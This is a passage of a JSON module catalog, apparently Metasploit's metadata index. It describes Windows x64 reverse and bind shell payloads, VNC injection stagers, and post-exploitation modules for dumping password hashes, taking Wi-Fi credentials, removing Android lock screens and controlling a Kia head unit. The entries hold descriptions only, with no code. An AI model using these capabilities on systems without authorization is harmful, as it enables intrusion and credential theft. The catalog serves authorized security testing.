"Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - 
"payload_windows/x64/shell/bind_tcp_uuid": { - "name": "Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/shell/reverse_tcp": { - "name": "Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": 
"windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/shell/reverse_tcp_rc4": { - "name": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/shell/reverse_tcp_uuid": { - "name": "Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/reverse_tcp_uuid", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/shell_bind_tcp": { - "name": "Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/windows/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Listen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/shell_reverse_tcp": { - "name": "Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/windows/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Connect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - 
"payload_windows/x64/vncinject/bind_ipv6_tcp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 
11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/vncinject/bind_named_pipe": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/vncinject/bind_tcp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Inject a 
VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/vncinject/bind_tcp_rc4": { - "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": 
"windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/vncinject/bind_tcp_uuid": { - "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/vncinject/reverse_http": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_windows/x64/vncinject/reverse_https": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_windows/x64/vncinject/reverse_tcp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/vncinject/reverse_tcp", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/vncinject/reverse_tcp_rc4": { - "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/vncinject/reverse_tcp_uuid": { - "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/vncinject/reverse_winhttp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_windows/x64/vncinject/reverse_winhttps": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "post_aix/hashdump": { - 
"name": "AIX Gather Dump Password Hashes", - "fullname": "post/aix/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "Post module to dump the password hashes for all users on an AIX system.", - "references": [], - "platform": "AIX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-26 16:28:15 +0000", - "path": "/modules/post/aix/hashdump.rb", - "is_install_path": true, - "ref_name": "aix/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/capture/screen": { - "name": "Android Screen Capture", - "fullname": "post/android/capture/screen", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module takes a screenshot of the target phone.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/capture/screen.rb", - "is_install_path": true, - "ref_name": "android/capture/screen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/gather/hashdump": { - "name": "Android Gather Dump Password Hashes for Android Systems", - "fullname": "post/android/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "timwr" - ], - "description": "Post 
Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.", - "references": [ - "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/", - "URL-https://hashcat.net/forum/thread-2202.html" - ], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "android/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/gather/sub_info": { - "name": "Extract Subscriber Info", - "fullname": "post/android/gather/sub_info", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Auxilus" - ], - "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like IMEI, etc.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/gather/sub_info.rb", - "is_install_path": true, - "ref_name": "android/gather/sub_info", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - 
"session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/gather/wireless_ap": { - "name": "Gather Wireless SSIDs and PSKs", - "fullname": "post/android/gather/wireless_ap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Auxilus", - "timwr" - ], - "description": "This module displays all wireless AP creds saved on the target device.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/gather/wireless_ap.rb", - "is_install_path": true, - "ref_name": "android/gather/wireless_ap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/local/koffee": { - "name": "KOFFEE - Kia OFFensivE Exploit", - "fullname": "post/android/local/koffee", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-12-02", - "type": "post", - "author": [ - "Gianpiero Costantino", - "Ilaria Matteucci" - ], - "description": "This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to\n attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on\n SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. 
This module, run on an\n active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head\n unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.", - "references": [ - "CVE-2020-8539", - "URL-https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf" - ], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/android/local/koffee.rb", - "is_install_path": true, - "ref_name": "android/local/koffee", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects", - "config-changes", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "CAMERA_REVERSE_OFF", - "description": "It hides the parking camera video stream" - }, - { - "name": "CAMERA_REVERSE_ON", - "description": "It shows the parking camera video stream" - }, - { - "name": "CLUSTER_CHANGE_LANGUAGE", - "description": "It changes the cluster language" - }, - { - "name": "CLUSTER_RADIO_INFO", - "description": "It shows radio info in the instrument cluster " - }, - { - "name": "CLUSTER_RANDOM_NAVIGATION", - "description": "It shows navigation signals in the instrument cluster " - }, - { - "name": "CLUSTER_ROUNDABOUT_FARAWAY", - "description": "It shows a round about signal with variable distance in the instrument cluster " - }, - { - "name": "CLUSTER_SPEED_LIMIT", - "description": "It changes the speed limit shown in the instrument cluster" - }, - { - "name": "HIGH_SCREEN_BRIGHTNESS", - "description": "It increases the head unit screen brightness" - }, - { - "name": "INJECT_CUSTOM", - "description": "It injects custom micom payloads" - }, - { - "name": "LOW_FUEL_WARNING", - "description": "It pops up a low fuel message on the head 
unit" - }, - { - "name": "LOW_SCREEN_BRIGHTNESS", - "description": "It decreases the head unit screen brightness" - }, - { - "name": "MAX_RADIO_VOLUME", - "description": "It sets the radio volume to the max" - }, - { - "name": "NAVIGATION_FULL_SCREEN", - "description": "It pops up the navigation app window" - }, - { - "name": "REDUCE_RADIO_VOLUME", - "description": "It decreases the radio volume" - }, - { - "name": "SEEK_DOWN_SEARCH", - "description": "It triggers the seek down radio frequency search" - }, - { - "name": "SEEK_UP_SEARCH", - "description": "It triggers the seek up radio frequency search" - }, - { - "name": "SET_NAVIGATION_ADDRESS", - "description": "It pops up the navigation address window" - }, - { - "name": "SWITCH_OFF_HU", - "description": "It switches off the head unit" - }, - { - "name": "SWITCH_ON_HU", - "description": "It switches on the head unit" - }, - { - "name": "TOGGLE_RADIO_MUTE", - "description": "It mutes/umutes the radio" - } - ] - }, - "post_android/manage/remove_lock": { - "name": "Android Settings Remove Device Locks (4.0-4.3)", - "fullname": "post/android/manage/remove_lock", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-11", - "type": "post", - "author": [ - "CureSec", - "timwr" - ], - "description": "This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.\n Any unprivileged app can exploit this vulnerability to remove the lockscreen.\n A logic flaw / design error exists in the settings application that allows an Intent from any\n application to clear the screen lock. 
The user may see that the Settings application has crashed,\n and the phone can then be unlocked by a swipe.\n This vulnerability was patched in Android 4.4.", - "references": [ - "CVE-2013-6271", - "URL-http://blog.curesec.com/article/blog/26.html", - "URL-http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf" - ], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/manage/remove_lock.rb", - "is_install_path": true, - "ref_name": "android/manage/remove_lock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/manage/remove_lock_root": { - "name": "Android Root Remove Device Locks (root)", - "fullname": "post/android/manage/remove_lock_root", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module uses root privileges to remove the device lock.\n In some cases the original lock method will still be present but any key/gesture will\n unlock the device.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/manage/remove_lock_root.rb", - "is_install_path": true, - "ref_name": 